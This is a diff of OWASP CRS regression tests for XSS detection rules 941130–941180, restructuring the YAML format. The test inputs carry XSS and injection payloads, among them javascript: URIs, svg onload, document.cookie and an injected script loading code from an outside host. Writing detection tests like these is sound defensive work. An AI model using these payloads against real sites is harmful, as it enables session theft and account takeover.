User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941130" + - test_id: 2 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 3 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=aai" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-4 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=aai" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 4 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=abcd'||(select extractvalue(xmltype('%cgger;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-5 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=abcd'||(select extractvalue(xmltype('%cgger;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 5 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-6 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 6 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 7 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=afa" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-8 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=afa" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 8 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=chj" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-9 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=chj" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 9 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-10 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 10 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-11 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 11 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-12 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=file:/boot.ini'||(select extractvalue(xmltype('%cwtpc;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 12 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=Matched Data: %awfke;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-13 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=Matched Data: %awfke;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 13 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=oez" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-14 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=oez" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 14 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=(select extractvalue(xmltype('%anwyn;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-15 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=(select extractvalue(xmltype('%anwyn;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 15 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-16 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 16 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-17 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=2010-01-01'||(select extractvalue(xmltype('%fhklu;" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 17 desc: "FP test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post/api/v1/query?q=7XMLNS" - version: HTTP/1.0 - output: - no_log_contains: id "941130" - - test_title: 941130-18 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post/api/v1/query?q=7XMLNS" + version: HTTP/1.0 + output: + no_log_contains: id "941130" + - test_id: 18 desc: "XSS test with encoded newline for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=chj" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-19 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=chj" + version: HTTP/1.0 + output: + log_contains: id "941130" + - test_id: 19 desc: "Status Test Page - simple test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - headers: - Host: localhost - User-Agent: "foo!ENTITY % bar SYSTEM" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "941130" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + headers: + Host: localhost + User-Agent: "foo!ENTITY % bar SYSTEM" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "941130" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml index 6f0599b13..104001d42 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml @@ -1,74 +1,69 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941140.yaml" description: "Tests to trigger, or not trigger 941130" +rule_id: 941140 tests: - - test_title: 941140-1 + - test_id: 1 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E' - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E' + version: "HTTP/1.1" + output: + log_contains: id "941140" + - test_id: 2 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' + version: "HTTP/1.1" + output: + log_contains: id "941140" + - test_id: 3 desc: XSS vectors making use of javascript uri and tags, e.g.,

, in COOKIE stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941140" - - test_title: 941140-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941140" + - test_id: 4 desc: "Status Page Test - x=x:url(javascript as GET variable" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/bar?test=x%3Dx%3Aurl%28javascript" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941140" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/bar?test=x%3Dx%3Aurl%28javascript" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941140" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml index d68a05eea..03401b696 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml @@ -1,41 +1,38 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941150.yaml" description: "Tests to trigger, or not trigger 941150" +rule_id: 941150 tests: - - test_title: 941150-1 + - test_id: 1 desc: Disallowed HTML entities, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941150-1%3D%3Ca%20href%3D%22test%22' - version: "HTTP/1.1" - output: - log_contains: id "941150" - - test_title: 941150-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941150-1%3D%3Ca%20href%3D%22test%22' + version: "HTTP/1.1" + output: + log_contains: id "941150" + - test_id: 2 desc: Disallowed HTML entities, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "payload=XSS" - version: "HTTP/1.1" - output: - log_contains: id "941150" + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "payload=XSS" + version: "HTTP/1.1" + output: + log_contains: id "941150" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml index 3259fd6d9..acbd0005e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml @@ -1,267 +1,250 @@ --- meta: author: "csanders-git, Franziska Bühler, Walter Hop, Xhoenix, azurit" - enabled: true - name: "941160.yaml" description: "Tests to trigger, or not trigger 941160" +rule_id: 941160 tests: - - test_title: 941160-1 + - test_id: 1 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941160" - - test_title: 941160-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941160" + - test_id: 2 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941160" - - test_title: 941160-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941160" + - test_id: 3 desc: "just another XSS teststring: " - version: HTTP/1.0 - output: - log_contains: id "941160" - - test_title: 941160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='\">" + version: HTTP/1.0 + output: + log_contains: id "941160" + - test_id: 15 desc: "SVG onload injection in filename" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php/%3Csvg/onload=alert()" - version: HTTP/1.0 - output: - log_contains: id "941160" - - test_title: 941160-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php/%3Csvg/onload=alert()" + version: HTTP/1.0 + output: + log_contains: id "941160" + - test_id: 16 desc: "Detect XSS injection of 'dialog' tag ('" - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "payload=javascript:/*-->" + version: "HTTP/1.1" + output: + log_contains: id "941170" + - test_id: 3 desc: 'Test first backslash match (javascript:(?:[\s\S]+[=\x5c\(\[\.<]) with: javascript: \\\\t (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log_contains: id "941170" + - test_id: 4 desc: 'Test second backslash match (javascript:(?:...|\x5c[ux]\d)) with: javascript:\\\\u0020 (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log_contains: id "941170" + - test_id: 5 desc: "Status Page Test - data: , as GET variable" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log_contains: id "941170" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index ba33b770f..8761c2eb6 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml @@ -1,125 +1,117 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941180.yaml" description: "Tests to trigger, or not trigger 941180" +rule_id: 941180 tests: - - test_title: 941180-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-1=window.location' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-1=window.location' + version: "HTTP/1.1" + output: + log_contains: id "941180" + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'document.cookie=941180-2' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'document.cookie=941180-2' + version: "HTTP/1.1" + output: + log_contains: id "941180" + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'window.location=941180-3' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" 